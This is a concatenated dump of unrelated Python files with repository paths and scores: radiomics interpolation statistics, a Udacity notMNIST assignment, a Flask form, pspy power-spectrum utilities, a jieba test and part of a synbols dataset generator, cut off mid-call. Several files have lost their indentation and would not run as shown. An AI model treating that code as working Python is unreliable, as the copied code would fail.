    print(x.__getitem__(4))
results texture.py | wr0gers/PixelMiner | 0 | 12797352 | <filename>results texture.py
import os
import re
import numpy as np
import matplotlib.pyplot as plt
from ccc import concordance_correlation_coefficient
from scipy.stats import wilcoxon, ttest_rel, ttest_ind, mannwhitneyu, ranksums
from scipy.stats import f, shapiro, bartlett, f_oneway, kruskal
from statsmodels.stats.weightstats import ztest
from scipy.stats import binom_test
from radiomics import featureextractor, getTestCase
import SimpleITK as sitk
import pandas as pd
from random import randint
from tqdm import tqdm
from PIL import Image, ImageOps, ImageEnhance
#from sklearn.model_selection import train_test_split
from sklearn.feature_extraction import image
import matplotlib.pyplot as plt
from functools import partial
from get_features_functions import get_features, final, get_results, display_results
from get_features_functions import listfiles, unnormalize, get_all_features
from get_features_functions import rmses, wilcoxons, ttests, para_non_para
from get_features_functions import get_all_features, get_rmses, normalize
def unnormalize(img):
    """Map an array from [-1, 1] back to raw intensity and cast to uint8.

    NOTE: the arithmetic is performed in place, mutating the caller's array
    (matching the original behaviour); values above 255 wrap in the uint8
    cast. Prints the resulting min/max as a side effect.
    """
    np.add(img, 1, out=img)
    np.divide(img, 2, out=img)
    np.multiply(img, 1024 + 3071, out=img)
    img = img.astype(np.uint8)
    print(img.min(), img.max())
    return img
def normalize(a):
    """Rescale *a* linearly onto [0, 1] using its own min and peak-to-peak range."""
    lo = np.min(a)
    return (a - lo) / np.ptp(a)
def rse(x, y):
    """Element-wise absolute error between x and y.

    Equivalent to the original sqrt((x - y)**2), but computed directly as an
    absolute value, which avoids overflow in the squared intermediate.
    """
    return np.abs(x - y)
# --- Load two sample volumes and derive feature names -----------------------
n = 0
path = r'H:\Data\W'
files = os.listdir(path)
print(files[14])
arr1 = np.load(os.path.join(path, files[14]))
arr1 = unnormalize(arr1)
print(arr1.dtype, arr1.min(), arr1.max())
print(files[8])
arr2 = np.load(os.path.join(path, files[8]))
features = get_features(arr1, arr2)
# Keep non-diagnostic keys, strip the 'original_' prefix, split CamelCase,
# then split class/name pairs on '_'.
features = [key for key in features.keys() if key.find('diagnostic') < 0]
features = [feature[9:] for feature in features]
features = [re.sub(r"(\w)([A-Z])", r"\1 \2", feature) for feature in features]
features = [feature.split('_') for feature in features]
features = np.array(features)

# --- Gather radiomic features for each interpolation method -----------------
lung_itp = {}
lung_tru = get_all_features(path, 'tru_one', 'lung')
lung_cnn = get_all_features(path, 'PixelCNN', 'lung')
lung_itp['Linear'] = get_all_features(path, 'Linear', 'lung')
lung_itp['BSpline'] = get_all_features(path, 'BSpline', 'lung')
lung_itp['Cosine'] = get_all_features(path, 'Cosine', 'lung')
lung_itp['Nearest'] = get_all_features(path, 'Nearest', 'lung')
lung_results = get_results(lung_tru, lung_cnn, lung_itp)
display_results(lung_results, features)

# --- Pairwise error comparison between methods ------------------------------
cnn_diff = rse(lung_tru, lung_cnn)
lin_diff = rse(lung_tru, lung_itp['Linear'])
cos_diff = rse(lung_tru, lung_itp['Cosine'])
ner_diff = rse(lung_tru, lung_itp['Nearest'])
bsp_diff = rse(lung_tru, lung_itp['BSpline'])
# Total number of (case, feature) cells being compared.
t = cnn_diff.shape[0] * cnn_diff.shape[1]
print()
print('Percent Greater:')
print('Linear\t\t\t Win Sinc\t\t\t Nearest\t\t\t BSpline\t\t\t PixelMiner')
print('\t-\t\t\t' , (lin_diff < cos_diff).sum() / t, (lin_diff < ner_diff).sum() / t, (lin_diff < bsp_diff).sum() / t, (lin_diff < cnn_diff).sum() / t)
print((cos_diff < lin_diff).sum() / t, '\t-\t\t\t' , (cos_diff < ner_diff).sum() / t, (cos_diff < bsp_diff).sum() / t, (cos_diff < cnn_diff).sum() / t)
print((ner_diff < lin_diff).sum() / t, (ner_diff < cos_diff).sum() / t, '\t-\t\t\t' , (ner_diff < bsp_diff).sum() / t, (ner_diff < cnn_diff).sum() / t)
print((bsp_diff < lin_diff).sum() / t, (bsp_diff < cos_diff).sum() / t, (bsp_diff < ner_diff).sum() / t, '\t-\t\t\t' , (bsp_diff < cnn_diff).sum() / t)
print((cnn_diff < lin_diff).sum() / t, (cnn_diff < cos_diff).sum() / t, (cnn_diff < ner_diff).sum() / t, (cnn_diff < bsp_diff).sum() / t, '\t-\t\t' )

# --- Normalized errors (per feature) and summary statistics -----------------
error = np.array([cnn_diff, lin_diff, cos_diff, ner_diff, bsp_diff])
n_error = np.zeros((5, 50, 51))
for i in range(error.shape[-1]):
    n_error[:, :, i] = normalize(error[:, :, i])
print()
print('NRMSE Mean:')
print('PixelMiner:', n_error[0].mean())
print('Linear:', n_error[1].mean())
print('Win Sinc:', n_error[2].mean())
print('Nearest:', n_error[3].mean())
print('BSpline', n_error[4].mean())
print()
print('NRMSE STD:')
print('PixelMiner:', n_error[0].std())
print('Linear:', n_error[1].std())
print('Win Sinc:', n_error[2].std())
print('Nearest:', n_error[3].std())
print('BSpline', n_error[4].std())

# --- Concordance correlation per feature ------------------------------------
ccc_cnn = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_cnn[:, i]) for i in range(lung_tru.shape[1])])
ccc_lin = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_itp['Linear'][:, i]) for i in range(lung_tru.shape[1])])
ccc_bsp = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_itp['BSpline'][:, i]) for i in range(lung_tru.shape[1])])
ccc_ws = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_itp['Cosine'][:, i]) for i in range(lung_tru.shape[1])])
ccc_nn = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_itp['Nearest'][:, i]) for i in range(lung_tru.shape[1])])
cccs = np.vstack((ccc_cnn, ccc_bsp, ccc_nn, ccc_ws, ccc_lin))
print('Mean CCC')
print('PixelMiner', cccs[0].mean(), '\n'
      'Win Sinc', cccs[3].mean(), '\n'
      'BSpline', cccs[1].mean(), '\n'
      'Nearest', cccs[2].mean(), '\n'
      'Linear', cccs[4].mean())
print()
print('Reproducibility')
# Fraction of the 51 features whose CCC exceeds the 0.85 threshold.
thresh = .85
print('PixelMiner', (cccs[0] > thresh).sum() / 51, '\n'
      'Win Sinc', (cccs[3] > thresh).sum() / 51, '\n'
      'BSpline', (cccs[1] > thresh).sum() / 51, '\n'
      'Nearest', (cccs[2] > thresh).sum() / 51, '\n'
      'Linear', (cccs[4] > thresh).sum() / 51)

# --- Significance tests -----------------------------------------------------
print('Wilcoxons:')
print('Win Sinc:', wilcoxon(n_error[:, 0, :].flatten(), n_error[:, 2, :].flatten()))
print('Linear:', wilcoxon(n_error[:, 0, :].flatten(), n_error[:, 1, :].flatten()))
print('BSpline:', wilcoxon(n_error[:, 0, :].flatten(), n_error[:, 4, :].flatten()))
print('Nearest:', wilcoxon(n_error[:, 0, :].flatten(), n_error[:, 3, :].flatten()))
shape = n_error.shape[0] * n_error.shape[2]
print('Binomial test:')
print('Win Sinc:', binom_test((n_error[:, 0, :] < n_error[:, 2, :]).sum() , shape))
print('Linear:', binom_test((n_error[:, 0, :] < n_error[:, 1, :]).sum() , shape))
print('BSpline:', binom_test((n_error[:, 0, :] < n_error[:, 4, :]).sum() , shape))
print('Nearest:', binom_test((n_error[:, 0, :] < n_error[:, 3, :]).sum() , shape))
| 1.65625 | 2 |
udacity/deep-learning/assignments/notmnist.py | balazssimon/ml-playground | 0 | 12797360 | # These are all the modules we'll be using later. Make sure you can import them
# before proceeding further.
# code changed to Python3
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import os
import sys
import tarfile
from IPython.display import display, Image
from scipy import ndimage
from sklearn.linear_model import LogisticRegression
from sklearn.metrics.pairwise import cosine_similarity
from urllib.request import urlretrieve
import pickle
import IPython
# Config the matlotlib backend as plotting inline in IPython
# %matplotlib inline
# Base URL hosting the notMNIST archives.
url = 'http://commondatastorage.googleapis.com/books1000/'
# Last progress percentage printed, so the hook only reports changes.
last_percent_reported = None
def download_progress_hook(count, blockSize, totalSize):
    """A hook to report the progress of a download. This is mostly intended for users with
    slow internet connections. Reports every 1% change in download progress.
    """
    global last_percent_reported
    percent = int(count * blockSize * 100 / totalSize)

    # Only emit output when the integer percentage actually changed.
    if last_percent_reported == percent:
        return
    if percent % 5 == 0:
        sys.stdout.write("%s%%" % percent)
    else:
        sys.stdout.write(".")
    sys.stdout.flush()
    last_percent_reported = percent
def maybe_download(filename, expected_bytes, force=False):
"""Download a file if not present, and make sure it's the right size."""
if force or not os.path.exists(filename):
print('Attempting to download:', filename)
filename, _ = urlretrieve(url + filename, filename, reporthook=download_progress_hook)
print('\nDownload Complete!')
statinfo = os.stat(filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
raise Exception(
'Failed to verify ' + filename + '. Can you get to it with a browser?')
return filename
train_filename = maybe_download('notMNIST_large.tar.gz', 247336696)
test_filename = maybe_download('notMNIST_small.tar.gz', 8458043)
num_classes = 10
np.random.seed(133)
def maybe_extract(filename, force=False):
root = os.path.splitext(os.path.splitext(filename)[0])[0] # remove .tar.gz
if os.path.isdir(root) and not force:
# You may override by setting force=True.
print('%s already present - Skipping extraction of %s.' % (root, filename))
else:
print('Extracting data for %s. This may take a while. Please wait.' % root)
tar = tarfile.open(filename)
sys.stdout.flush()
tar.extractall()
tar.close()
data_folders = [
os.path.join(root, d) for d in sorted(os.listdir(root))
if os.path.isdir(os.path.join(root, d))]
if len(data_folders) != num_classes:
raise Exception(
'Expected %d folders, one per class. Found %d instead.' % (
num_classes, len(data_folders)))
print(data_folders)
return data_folders
train_folders = maybe_extract(train_filename)
test_folders = maybe_extract(test_filename)
#IPython.display.display_png('notMNIST_large/B/MDEtMDEtMDAudHRm.png')
#IPython.display.display_png('notMNIST_large/J/Nng3b2N0IEFsdGVybmF0ZSBSZWd1bGFyLnR0Zg==.png')
image_size = 28 # Pixel width and height.
pixel_depth = 255.0 # Number of levels per pixel.
def load_letter(folder, min_num_images):
"""Load the data for a single letter label."""
image_files = os.listdir(folder)
dataset = np.ndarray(shape=(len(image_files), image_size, image_size),
dtype=np.float32)
print(folder)
num_images = 0
for image in image_files:
image_file = os.path.join(folder, image)
try:
image_data = (ndimage.imread(image_file).astype(float) -
pixel_depth / 2) / pixel_depth
if image_data.shape != (image_size, image_size):
raise Exception('Unexpected image shape: %s' % str(image_data.shape))
dataset[num_images, :, :] = image_data
num_images = num_images + 1
except IOError as e:
print('Could not read:', image_file, ':', e, '- it\'s ok, skipping.')
dataset = dataset[0:num_images, :, :]
if num_images < min_num_images:
raise Exception('Many fewer images than expected: %d < %d' %
(num_images, min_num_images))
print('Full dataset tensor:', dataset.shape)
print('Mean:', np.mean(dataset))
print('Standard deviation:', np.std(dataset))
return dataset
def maybe_pickle(data_folders, min_num_images_per_class, force=False):
dataset_names = []
for folder in data_folders:
set_filename = folder + '.pickle'
dataset_names.append(set_filename)
if os.path.exists(set_filename) and not force:
# You may override by setting force=True.
print('%s already present - Skipping pickling.' % set_filename)
else:
print('Pickling %s.' % set_filename)
dataset = load_letter(folder, min_num_images_per_class)
try:
with open(set_filename, 'wb') as f:
pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)
except Exception as e:
print('Unable to save data to', set_filename, ':', e)
return dataset_names
train_datasets = maybe_pickle(train_folders, 45000)
test_datasets = maybe_pickle(test_folders, 1800)
def load_dataset(filename):
with open(filename, 'rb') as f:
return pickle.load(f)
# Display a random matrix with a specified figure number and a grayscale colormap
# largeNameA = train_datasets[0]
# print(largeNameA)
# largeDataA = load_dataset(largeNameA)
# img1 = largeDataA[0, :, :]
# plt.matshow(img1, cmap=plt.cm.gray)
# plt.show()
#
# smallNameJ = test_datasets[9]
# print(smallNameJ)
# smallDataJ = load_dataset(smallNameJ)
# img2 = smallDataJ[0, :, :]
# plt.matshow(img2, cmap=plt.cm.gray)
# plt.show()
# Check whether the data is balanced between classes
# for name in train_datasets:
# dataset = load_dataset(name)
# print(name, ' size:', dataset.shape)
#
# for name in test_datasets:
# dataset = load_dataset(name)
# print(name, ' size:', dataset.shape)
def make_arrays(nb_rows, img_size):
if nb_rows:
dataset = np.ndarray((nb_rows, img_size, img_size), dtype=np.float32)
labels = np.ndarray(nb_rows, dtype=np.int32)
else:
dataset, labels = None, None
return dataset, labels
def merge_datasets(pickle_files, train_size, valid_size=0):
num_classes = len(pickle_files)
valid_dataset, valid_labels = make_arrays(valid_size, image_size)
train_dataset, train_labels = make_arrays(train_size, image_size)
vsize_per_class = valid_size // num_classes
tsize_per_class = train_size // num_classes
start_v, start_t = 0, 0
end_v, end_t = vsize_per_class, tsize_per_class
end_l = vsize_per_class + tsize_per_class
for label, pickle_file in enumerate(pickle_files):
try:
with open(pickle_file, 'rb') as f:
letter_set = pickle.load(f)
# let's shuffle the letters to have random validation and training set
np.random.shuffle(letter_set)
if valid_dataset is not None:
valid_letter = letter_set[:vsize_per_class, :, :]
valid_dataset[start_v:end_v, :, :] = valid_letter
valid_labels[start_v:end_v] = label
start_v += vsize_per_class
end_v += vsize_per_class
train_letter = letter_set[vsize_per_class:end_l, :, :]
train_dataset[start_t:end_t, :, :] = train_letter
train_labels[start_t:end_t] = label
start_t += tsize_per_class
end_t += tsize_per_class
except Exception as e:
print('Unable to process data from', pickle_file, ':', e)
raise
return valid_dataset, valid_labels, train_dataset, train_labels
# def show_images(dataset, labels, count):
# for i in range(0,count):
# print(labels[i])
# plt.matshow(dataset[i,:,:], cmap=plt.cm.gray)
# plt.show()
# show_images(train_dataset, train_labels, 3)
# show_images(test_dataset, test_labels, 3)
# show_images(valid_dataset, valid_labels, 3)
pickle_file = 'notMNIST.pickle'
if not os.path.exists(pickle_file):
train_size = 200000
valid_size = 10000
test_size = 10000
valid_dataset, valid_labels, train_dataset, train_labels = merge_datasets(
train_datasets, train_size, valid_size)
_, _, test_dataset, test_labels = merge_datasets(test_datasets, test_size)
indices = np.arange(train_dataset.shape[0])
np.random.shuffle(indices)
train_dataset = train_dataset[indices]
train_labels = train_labels[indices]
try:
f = open(pickle_file, 'wb')
save = {
'train_dataset': train_dataset,
'train_labels': train_labels,
'valid_dataset': valid_dataset,
'valid_labels': valid_labels,
'test_dataset': test_dataset,
'test_labels': test_labels,
}
pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)
f.close()
except Exception as e:
print('Unable to save data to', pickle_file, ':', e)
raise
def load_datasets(pickle_file):
statinfo = os.stat(pickle_file)
print('Compressed pickle size:', statinfo.st_size)
f = open(pickle_file, 'rb')
save = pickle.load(f)
f.close()
train_dataset = save['train_dataset']
train_labels = save['train_labels']
valid_dataset = save['valid_dataset']
valid_labels = save['valid_labels']
test_dataset = save['test_dataset']
test_labels = save['test_labels']
return train_dataset, train_labels, valid_dataset, valid_labels, test_dataset, test_labels
train_dataset, train_labels, valid_dataset, valid_labels, test_dataset, test_labels = load_datasets(pickle_file)
print('Training:', train_dataset.shape, train_labels.shape)
print('Validation:', valid_dataset.shape, valid_labels.shape)
print('Testing:', test_dataset.shape, test_labels.shape)
def sanitize_dataset(dataset, labels, filter_dataset, similarity_epsilon):
similarity = cosine_similarity(np.reshape(dataset, (dataset.shape[0],-1)), np.reshape(filter_dataset, (filter_dataset.shape[0],-1)))
same_filter = np.sum(similarity == 1, axis=1) > 0
similar_filter = np.sum(similarity > 1-similarity_epsilon, axis=1) > 0
same_count = np.sum(same_filter)
similar_count = np.sum(similar_filter)
filtered_dataset = dataset[same_filter==False]
filtered_labels = labels[same_filter==False]
return filtered_dataset, filtered_labels, same_count, similar_count
sanit_pickle_file = 'notMNIST_sanit.pickle'
if not os.path.exists(sanit_pickle_file):
filtered_valid_dataset, filtered_valid_labels, train_valid_same, train_valid_similar = \
sanitize_dataset(valid_dataset, valid_labels, train_dataset, 0.001)
print("training-validation: same=", train_valid_same, "similar=", train_valid_similar)
filtered_test_dataset, filtered_test_labels, train_test_same, train_test_similar = \
sanitize_dataset(test_dataset, test_labels, train_dataset, 0.001)
print("training-testing: same=", train_test_same, "similar=", train_test_similar)
filtered_test_dataset, filtered_test_labels, valid_test_same, valid_test_similar = \
sanitize_dataset(filtered_test_dataset, filtered_test_labels, filtered_valid_dataset, 0.001)
print("validation-testing: same=", valid_test_same, "similar=", valid_test_similar)
try:
f = open(sanit_pickle_file, 'wb')
save = {
'train_dataset': train_dataset,
'train_labels': train_labels,
'valid_dataset': filtered_valid_dataset,
'valid_labels': filtered_valid_labels,
'test_dataset': filtered_test_dataset,
'test_labels': filtered_test_labels,
}
pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)
f.close()
except Exception as e:
print('Unable to save data to', pickle_file, ':', e)
raise
train_dataset, train_labels, filtered_valid_dataset, filtered_valid_labels, filtered_test_dataset, filtered_test_labels = load_datasets(sanit_pickle_file)
print('Training (sanitized):', train_dataset.shape, train_labels.shape)
print('Validation (sanitized):', filtered_valid_dataset.shape, filtered_valid_labels.shape)
print('Testing (sanitized):', filtered_test_dataset.shape, filtered_test_labels.shape)
def train_model(dataset, labels, size=None):
maxSize = dataset.shape[0]
if size is None:
size = maxSize
elif size > maxSize:
size = maxSize
else:
dataset = dataset[0:size]
labels = labels[0:size]
X = np.reshape(dataset, (size,-1))
y = labels
lr = LogisticRegression(n_jobs=4)
lr.fit(X, y)
return lr
def model_score(model, dataset, labels):
X = np.reshape(dataset, (dataset.shape[0],-1))
y = labels
return model.score(X, y)
def train(size=None):
if size is None:
print("Training with all examples:")
else:
print("Training with ", size, " examples:")
model = train_model(train_dataset, train_labels, size)
print(" validation score: ", model_score(model, valid_dataset, valid_labels))
print(" test score: ", model_score(model, test_dataset, test_labels))
print(" validation score (sanitized): ", model_score(model, filtered_valid_dataset, filtered_valid_labels))
print(" test score (sanitized): ", model_score(model, filtered_test_dataset, filtered_test_labels))
for size in [50, 100, 1000, 5000]:
train(size)
# training on all examples:
#train()
| 1.914063 | 2 |
app/form.py | CalebF98/tbcc-moonkin-dps-simulator | 0 | 12797368 | from flask_wtf import FlaskForm
from wtforms import StringField, IntegerField
from wtforms.fields.simple import SubmitField
from wtforms.validators import DataRequired, NumberRange
class SimParamsForm(FlaskForm):
intellect = IntegerField('Intellect', [NumberRange(0,1000)])
spellpower = IntegerField('Spellpower', [NumberRange(0,1000)])
hit_score = IntegerField('Spell Hit Rating', [NumberRange(0,202)])
crit_score = IntegerField('Spell Crit Rating', [NumberRange(0,500)])
haste_score = IntegerField('Spell Haste Rating', [NumberRange(0,1000)])
num_fights = IntegerField('# of fights to simulate', [NumberRange(1,2500)]) | 1.195313 | 1 |
pspy/pspy_utils.py | xgarrido/pspy | 6 | 12797376 | <reponame>xgarrido/pspy
"""
Utils for pspy.
"""
import os
import numpy as np
def ps_lensed_theory_to_dict(filename, output_type, lmax=None, start_at_zero=False):
"""Read a lensed power spectrum from CAMB and return a dictionnary
Parameters
----------
filename : string
the name of the CAMB lensed power spectrum you want to read
lmax : integer
the maximum multipole (spectra will be cut at)
output_type : string
'Cl' or 'Dl'
start_at_zero : boolean
if True, ps start at l=0 and cl(l=0) and cl(l=1) are set to 0
"""
fields = ["TT", "TE", "TB", "ET", "BT", "EE", "EB", "BE", "BB"]
ps = {}
l, ps["TT"], ps["EE"], ps["BB"], ps["TE"] = np.loadtxt(filename, unpack=True)
ps["ET"] = ps["TE"].copy()
ps["TB"], ps["BT"], ps["EB"], ps["BE"] = np.zeros((4, len(l)))
if lmax is not None:
l = l[:lmax]
scale = l * (l + 1) / (2 * np.pi)
for f in fields:
if lmax is not None:
ps[f] = ps[f][:lmax]
if output_type == "Cl":
ps[f] /= scale
if start_at_zero:
ps[f] = np.append(np.array([0, 0]), ps[f])
if start_at_zero:
l = np.append(np.array([0, 1]), l)
return l, ps
def ps_from_params(cosmo_params, output_type, lmax, start_at_zero=False):
"""Given a set of cosmological parameters compute the corresponding lensed power spectrum
You need to have camb installed to use this function
----------
cosmo_params: dict
dictionnary of cosmological parameters
# e.g cosmo_params = {"cosmomc_theta":0.0104085, "logA": 3.044, "ombh2": 0.02237, "omch2": 0.1200, "ns": 0.9649, "Alens": 1.0, "tau": 0.0544}
output_type : string
'Cl' or 'Dl'
lmax: integer
the maximum multipole to consider
start_at_zero : boolean
if True, ps start at l=0 and cl(l=0) and cl(l=1) are set to 0
else, start at l=2
"""
try:
import camb
except ModuleNotFoundError:
raise ModuleNotFoundError("you need to install camb to use this function")
if start_at_zero:
lmin = 0
else:
lmin = 2
camb_cosmo = {k: v for k, v in cosmo_params.items() if k not in ["logA", "As"]}
camb_cosmo.update({"As": 1e-10*np.exp(cosmo_params["logA"]), "lmax": lmax, "lens_potential_accuracy": 1})
pars = camb.set_params(**camb_cosmo)
results = camb.get_results(pars)
powers = results.get_cmb_power_spectra(pars, CMB_unit="muK")
l = np.arange(lmin, lmax)
ps = {spec: powers["total"][l][:, count] for count, spec in enumerate(["TT", "EE", "BB", "TE" ])}
ps["ET"] = ps["TE"]
for spec in ["TB", "BT", "EB", "BE" ]:
ps[spec] = ps["TT"] * 0
scale = l * (l + 1) / (2 * np.pi)
if output_type == "Cl":
if start_at_zero:
ps[2:] /= scale[2:]
else:
ps[:] /= scale[:]
return l, ps
def get_nlth_dict(rms_uKarcmin_T, type, lmax, spectra=None, rms_uKarcmin_pol=None, beamfile=None):
"""Return the effective noise power spectrum Nl/bl^2 given a beam file and a noise rms
Parameters
----------
rms_uKarcmin_T: float
the temperature noise rms in uK.arcmin
type: string
'Cl' or 'Dl'
lmax: integer
the maximum multipole to consider
spectra: list of strings
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
rms_uKarcmin_pol: float
the polarisation noise rms in uK.arcmin
beamfile: string
the name of the beam transfer function (assuming it's given as a two column file l,bl)
"""
if beamfile is not None:
l, bl = np.loadtxt(beamfile, unpack=True)
else:
bl = np.ones(lmax + 2)
lth = np.arange(2, lmax + 2)
nl_th = {}
if spectra is None:
nl_th["TT"] = (
np.ones(lmax) * (rms_uKarcmin_T * np.pi / (60 * 180)) ** 2 / bl[2 : lmax + 2] ** 2
)
if type == "Dl":
nl_th["TT"] *= lth * (lth + 1) / (2 * np.pi)
return nl_th
else:
if rms_uKarcmin_pol is None:
rms_uKarcmin_pol = rms_uKarcmin_T * np.sqrt(2)
for spec in spectra:
nl_th[spec] = np.zeros(lmax)
nl_th["TT"] = np.ones(lmax) * (rms_uKarcmin_T * np.pi / (60 * 180)) ** 2 / bl[2 :lmax + 2] ** 2
nl_th["EE"] = np.ones(lmax) * (rms_uKarcmin_pol * np.pi / (60 * 180)) ** 2 / bl[2 :lmax + 2] ** 2
nl_th["BB"] = np.ones(lmax) * (rms_uKarcmin_pol * np.pi / (60 * 180)) ** 2 / bl[2 :lmax + 2] ** 2
if type == "Dl":
for spec in spectra:
nl_th[spec] *= lth * (lth + 1) / (2 * np.pi)
return nl_th
def read_beam_file(beamfile, lmax=None):
"""Read beam file with formal, l, bl, stuff and normalize it
Parameters
__________
beamfile: string
the name of the beam file
lmax: integer
the maximum multipole to consider
"""
beam = np.loadtxt(beamfile)
l, bl = beam[:, 0], beam[:, 1]
if lmax is not None:
l, bl = l[:lmax], bl[:lmax]
return l, bl / bl[0]
def create_binning_file(bin_size, n_bins, lmax=None, file_name=None):
"""Create a (constant) binning file, and optionnaly write it to disk
Parameters
----------
bin_size: float
the size of the bins
n_bins: integer
the number of bins
lmax: integer
the maximum multipole to consider
file_name: string
the name of the binning file
"""
bins = np.arange(n_bins)
bin_low = bins * bin_size + 2
bin_hi = (bins + 1) * bin_size + 1
bin_cent = (bin_low + bin_hi) / 2
if lmax is not None:
id = np.where(bin_hi < lmax)
bin_low, bin_hi, bin_cent = bin_low[id], bin_hi[id], bin_cent[id]
if file_name is None:
return bin_low, bin_hi, bin_cent
else:
f = open("%s" % file_name, mode="w")
for i in range(len(bin_low)):
f.write("%0.2f %0.2f %0.2f\n" % (bin_low[i], bin_hi[i], bin_cent[i]))
f.close()
def read_binning_file(file_name, lmax):
"""Read a binningFile and truncate it to lmax, if bin_low lower than 2, set it to 2.
format is bin_low, bin_high, bin_mean
Parameters
----------
binningfile: string
the name of the binning file
lmax: integer
the maximum multipole to consider
"""
bin_low, bin_hi, bin_cent = np.loadtxt(file_name, unpack=True)
id = np.where(bin_hi < lmax)
bin_low, bin_hi, bin_cent = bin_low[id], bin_hi[id], bin_cent[id]
if bin_low[0] < 2:
bin_low[0] = 2
bin_hi = bin_hi.astype(int)
bin_low = bin_low.astype(int)
bin_size = bin_hi - bin_low + 1
return bin_low, bin_hi, bin_cent, bin_size
def create_directory(name):
"""Create a directory
Parameters
----------
name: string
the name of the directory
"""
os.makedirs(name, exist_ok=True)
def naive_binning(l, fl, binning_file, lmax):
"""Bin a function of l given a binning file and lmax
Parameters
----------
l: 1d integer array
the multipoles
fl: 1d float array
the 1-dimensional function to bin
binning_file: string
the name of the binning file
lmax: integer
the maximum multipole to consider
"""
bin_low, bin_hi, bin_cent, bin_size = read_binning_file(binning_file, lmax)
n_bins = len(bin_hi)
fl_bin = np.zeros(len(bin_cent))
for ibin in range(n_bins):
loc = np.where((l >= bin_low[ibin]) & (l <= bin_hi[ibin]))
fl_bin[ibin] = (fl[loc]).mean()
return bin_cent, fl_bin
def beam_from_fwhm(fwhm_arcminute, lmax):
"""Compute the harmonic transform of the beam
given the beam full width half maximum in arcminute
Parameters
----------
fwhm_arcminute: float
full width half maximum in arcminute
lmax: integer
the maximum multipole to consider
"""
beam_fwhm_rad = np.deg2rad(fwhm_arcminute) / 60
fac = beam_fwhm_rad / np.sqrt(8 * np.log(2))
ell = np.arange(2, lmax)
bl = np.exp(-ell * (ell + 1) * fac ** 2 / 2.0)
return ell, bl
| 1.695313 | 2 |
self/test/preprocess_test.py | luweishuang/rasa | 0 | 12797384 | <gh_stars>0
# -*- coding: utf-8 -*-
import jieba
jieba.load_userdict("user_dict.txt")
line_list = ["查询安顺站一号风机的电压曲线",
"查询安各庄1母线的故障信息",
"开始进行南京站设备状态核实",
"看下安顺站3月1号的静态功率曲线"]
for cur_line in line_list:
seg_list = jieba.cut(cur_line.strip())
print("jieba rst: " + "/ ".join(seg_list))
| 1.476563 | 1 |
synbols/predefined_datasets.py | shikhar-srivastava/synbols | 0 | 12797392 | import logging
import numpy as np
import math
from .drawing import Camouflage, NoPattern, SolidColor, MultiGradient, ImagePattern, Gradient, Image, Symbol
from .fonts import LANGUAGE_MAP
from .generate import (
dataset_generator,
basic_attribute_sampler,
flatten_mask,
flatten_mask_except_first,
add_occlusion,
rand_seed,
)
def generate_i(n_samples, alphabet = None, language="english", font = 'calibri', set = "plain", seed=None, **kwargs):
    """Generate a single-font dataset of white-on-black symbols.

    Args:
        n_samples: number of images to generate.
        alphabet: alphabet to sample characters from; defaults to the
            non-bold alphabet of ``language``.
        language: language key used to look up the alphabet when
            ``alphabet`` is None.
        font: font name used for every symbol.
        set: which single factor of variation to enable; one of "plain"
            (none), "rotation", "translation" or "gradient".
            NOTE: this parameter name shadows the ``set`` builtin; kept
            unchanged for backward compatibility with existing callers.
        seed: dataset seed passed to ``dataset_generator``.

    Returns:
        The generator produced by ``dataset_generator``.
    """
    if alphabet is None:
        alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
    # Defaults: solid white foreground on solid black background, centered,
    # no rotation.  (Removed a leftover debug print of the alphabet.)
    fg = SolidColor((1, 1, 1))
    bg = SolidColor((0, 0, 0))
    rotation = 0
    translation = (0.0, 0.0)
    if set == 'rotation':
        # Uniform rotation in [0, pi).
        rotation = (lambda rng: rng.uniform(low=0, high=1) * math.pi)
    elif set == 'translation':
        # Uniform translation of each coordinate in [-1, 1].
        translation = (lambda rng: tuple(rng.uniform(low=-1, high=1, size=2)))
    elif set == 'gradient':
        # None lets the attribute sampler pick its default random patterns.
        fg = None
        bg = None
    attr_sampler = basic_attribute_sampler(
        alphabet=alphabet,
        font=font,
        is_slant=False,
        is_bold=False,
        background=bg,
        foreground=fg,
        rotation=rotation,
        scale=0.7,
        translation=translation,
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_dataset_alphabet_onlygrad(n_samples, chars, seed=None, **kwargs):
    """Generate plain, centered symbols restricted to ``chars`` with default colors.

    Characters are drawn uniformly from ``chars`` and fonts uniformly from a
    fixed five-font slice (indices 50:55) of the English alphabet's font
    list.  Foreground/background are left unspecified, so the attribute
    sampler uses its default (random pattern) colors.

    Args:
        n_samples: number of images to generate.
        chars: sequence of characters to sample from.
        seed: dataset seed passed to ``dataset_generator``.
    """
    alphabet = LANGUAGE_MAP['english'].get_alphabet(support_bold=False)
    #print(alphabet.fonts[:10])
    attr_sampler = basic_attribute_sampler(
        alphabet=alphabet,
        char=lambda rng: rng.choice(chars),
        # Fixed small font subset to limit font variation.
        font=lambda rng: rng.choice(alphabet.fonts[50:55]),
        is_slant=False,
        is_bold=False,
        rotation=0,
        scale=0.7,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_dataset_alphabet(n_samples, chars, seed=None, **kwargs):
    """Generate plain, centered symbols restricted to ``chars``.

    The foreground and background are each independently drawn from two
    options: a solid color (white foreground / black background) or a fixed
    image pattern (``ImagePattern(seed=123)``).  Fonts come from a fixed
    five-font slice (indices 50:55) of the English alphabet's font list.
    """
    alphabet = LANGUAGE_MAP['english'].get_alphabet(support_bold=False)
    foreground_options = [SolidColor((1, 1, 1)), ImagePattern(seed=123)]
    background_options = [SolidColor((0, 0, 0)), ImagePattern(seed=123)]

    def pick_char(rng):
        return rng.choice(chars)

    def pick_font(rng):
        return rng.choice(alphabet.fonts[50:55])

    attr_sampler = basic_attribute_sampler(
        alphabet=alphabet,
        char=pick_char,
        font=pick_font,
        is_slant=False,
